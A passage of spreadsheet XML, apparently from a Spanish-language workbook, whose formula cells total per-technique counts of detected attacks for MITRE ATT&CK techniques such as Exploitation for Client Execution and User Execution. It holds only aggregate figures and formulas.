        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>1</v>
      </c>
      <c r="BC37" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>7</v>
      </c>
      <c r="BD37" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>2</v>
      </c>
      <c r="BE37" s="4" t="str">
        <f t="shared" si="8"/>
        <v>2 (7)</v>
      </c>
      <c r="BF37" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>2</v>
      </c>
      <c r="BG37" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH37" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>1</v>
      </c>
      <c r="BI37" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>1</v>
      </c>
      <c r="BJ37" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>1</v>
      </c>
      <c r="BK37" s="322" t="str">
        <f t="shared" si="9"/>
        <v>1 (1)</v>
      </c>
      <c r="BL37" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>1</v>
      </c>
      <c r="BM37" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN37" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>1</v>
      </c>
      <c r="BO37" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>5</v>
      </c>
      <c r="BP37" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>5</v>
      </c>
      <c r="BQ37" s="4" t="str">
        <f t="shared" si="10"/>
        <v>5 (5)</v>
      </c>
      <c r="BR37" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>1</v>
      </c>
      <c r="BS37" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>4</v>
      </c>
      <c r="BT37" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU37" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>3</v>
      </c>
      <c r="BV37" s="292">
        <v>1</v>
      </c>
      <c r="BW37" s="322">
        <v>1</v>
      </c>
      <c r="BX37" s="4" t="str">
        <f t="shared" si="11"/>
        <v>1 (1)</v>
      </c>
      <c r="BY37" s="12">
        <v>1</v>
      </c>
      <c r="BZ37" s="13">
        <v>1</v>
      </c>
      <c r="CA37" s="394">
        <v>1</v>
      </c>
      <c r="CB37" s="288">
        <v>2</v>
      </c>
      <c r="CC37" s="4">
        <v>2</v>
      </c>
      <c r="CD37" s="4" t="str">
        <f t="shared" si="12"/>
        <v>2 (2)</v>
      </c>
      <c r="CE37" s="4">
        <v>1</v>
      </c>
      <c r="CF37" s="4">
        <v>1</v>
      </c>
      <c r="CG37" s="13">
        <v>1</v>
      </c>
      <c r="CH37" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="38" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A38" s="4">
        <f t="shared" si="13"/>
        <v>36</v>
      </c>
      <c r="B38" s="4" t="str">
        <f>IFERROR(VLOOKUP(A38,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1203</v>
      </c>
      <c r="C38" s="493" t="str">
        <f>IFERROR(VLOOKUP(B38,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exploitation for Client Execution</v>
      </c>
      <c r="D38" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B38)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E38" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>116</v>
      </c>
      <c r="F38" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (116)</v>
      </c>
      <c r="G38" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>1</v>
      </c>
      <c r="H38" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>1</v>
      </c>
      <c r="I38" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (1)</v>
      </c>
      <c r="J38" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K38" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L38" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>1</v>
      </c>
      <c r="M38" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>5505</v>
      </c>
      <c r="N38" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>112</v>
      </c>
      <c r="O38" s="322" t="str">
        <f t="shared" si="1"/>
        <v>112 (5505)</v>
      </c>
      <c r="P38" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>1</v>
      </c>
      <c r="Q38" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R38" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>112</v>
      </c>
      <c r="S38" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>5506</v>
      </c>
      <c r="T38" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>113</v>
      </c>
      <c r="U38" s="4" t="str">
        <f t="shared" si="2"/>
        <v>113 (5506)</v>
      </c>
      <c r="V38" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>2</v>
      </c>
      <c r="W38" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X38" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>112</v>
      </c>
      <c r="Y38" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>16570</v>
      </c>
      <c r="Z38" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>233</v>
      </c>
      <c r="AA38" s="322" t="str">
        <f t="shared" si="3"/>
        <v>233 (16570)</v>
      </c>
      <c r="AB38" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>2</v>
      </c>
      <c r="AC38" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD38" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>116</v>
      </c>
      <c r="AE38" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>5528</v>
      </c>
      <c r="AF38" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>135</v>
      </c>
      <c r="AG38" s="322" t="str">
        <f t="shared" si="4"/>
        <v>135 (5528)</v>
      </c>
      <c r="AH38" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>3</v>
      </c>
      <c r="AI38" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ38" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>112</v>
      </c>
      <c r="AK38" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>22098</v>
      </c>
      <c r="AL38" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>368</v>
      </c>
      <c r="AM38" s="322" t="str">
        <f t="shared" si="5"/>
        <v>368 (22098)</v>
      </c>
      <c r="AN38" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>8</v>
      </c>
      <c r="AO38" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP38" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>116</v>
      </c>
      <c r="AQ38" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR38" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS38" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT38" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU38" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV38" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW38" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX38" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY38" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ38" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA38" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB38" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC38" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>5506</v>
      </c>
      <c r="BD38" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>113</v>
      </c>
      <c r="BE38" s="4" t="str">
        <f t="shared" si="8"/>
        <v>113 (5506)</v>
      </c>
      <c r="BF38" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>2</v>
      </c>
      <c r="BG38" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH38" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>112</v>
      </c>
      <c r="BI38" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>224</v>
      </c>
      <c r="BJ38" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>112</v>
      </c>
      <c r="BK38" s="322" t="str">
        <f t="shared" si="9"/>
        <v>112 (224)</v>
      </c>
      <c r="BL38" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>1</v>
      </c>
      <c r="BM38" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN38" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>112</v>
      </c>
      <c r="BO38" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>454</v>
      </c>
      <c r="BP38" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>342</v>
      </c>
      <c r="BQ38" s="4" t="str">
        <f t="shared" si="10"/>
        <v>342 (454)</v>
      </c>
      <c r="BR38" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>1</v>
      </c>
      <c r="BS38" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>2</v>
      </c>
      <c r="BT38" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU38" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>115</v>
      </c>
      <c r="BV38" s="292">
        <v>213</v>
      </c>
      <c r="BW38" s="322">
        <v>205</v>
      </c>
      <c r="BX38" s="4" t="str">
        <f t="shared" si="11"/>
        <v>205 (213)</v>
      </c>
      <c r="BY38" s="12">
        <v>4</v>
      </c>
      <c r="BZ38" s="13">
        <v>1</v>
      </c>
      <c r="CA38" s="394">
        <v>112</v>
      </c>
      <c r="CB38" s="288">
        <v>426</v>
      </c>
      <c r="CC38" s="4">
        <v>317</v>
      </c>
      <c r="CD38" s="4" t="str">
        <f t="shared" si="12"/>
        <v>317 (426)</v>
      </c>
      <c r="CE38" s="4">
        <v>4</v>
      </c>
      <c r="CF38" s="4">
        <v>1</v>
      </c>
      <c r="CG38" s="13">
        <v>1</v>
      </c>
      <c r="CH38" s="394">
        <v>112</v>
      </c>
    </row>
    <row r="39" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A39" s="4">
        <f t="shared" si="13"/>
        <v>37</v>
      </c>
      <c r="B39" s="4" t="str">
        <f>IFERROR(VLOOKUP(A39,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1204</v>
      </c>
      <c r="C39" s="493" t="str">
        <f>IFERROR(VLOOKUP(B39,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>User Execution</v>
      </c>
      <c r="D39" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B39)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E39" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F39" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (1)</v>
      </c>
      <c r="G39" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>0</v>
      </c>
      <c r="H39" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>0</v>
      </c>
      <c r="I39" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J39" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>0</v>
      </c>
      <c r="K39" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>0</v>
      </c>
      <c r="L39" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>0</v>
      </c>
      <c r="M39" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N39" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O39" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P39" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q39" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R39" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S39" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>0</v>
      </c>
      <c r="T39" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>0</v>
      </c>
      <c r="U39" s="4" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V39" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>0</v>
      </c>
      <c r="W39" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>0</v>
      </c>
      <c r="X39" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>0</v>
      </c>
      <c r="Y39" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>0</v>
      </c>
      <c r="Z39" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>0</v>
      </c>
      <c r="AA39" s="322" t="str">
        <f t="shared" si="3"/>
        <v>0 (0)</v>
      </c>
      <c r="AB39" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>0</v>
      </c>
      <c r="AC39" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>0</v>
      </c>
      <c r="AD39" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>0</v>
      </c>
      <c r="AE39" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>4</v>
      </c>
      <c r="AF39" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>2</v>
      </c>
      <c r="AG39" s="322" t="str">
        <f t="shared" si="4"/>
        <v>2 (4)</v>
      </c>
      <c r="AH39" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>2</v>
      </c>
      <c r="AI39" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ39" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>1</v>
      </c>
      <c r="AK39" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>4</v>
      </c>
      <c r="AL39" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>2</v>
      </c>
      <c r="AM39" s="322" t="str">
        <f t="shared" si="5"/>
        <v>2 (4)</v>
      </c>
      <c r="AN39" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>2</v>
      </c>
      <c r="AO39" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP39" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>1</v>
      </c>
      <c r="AQ39" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR39" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS39" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT39" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU39" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV39" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW39" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
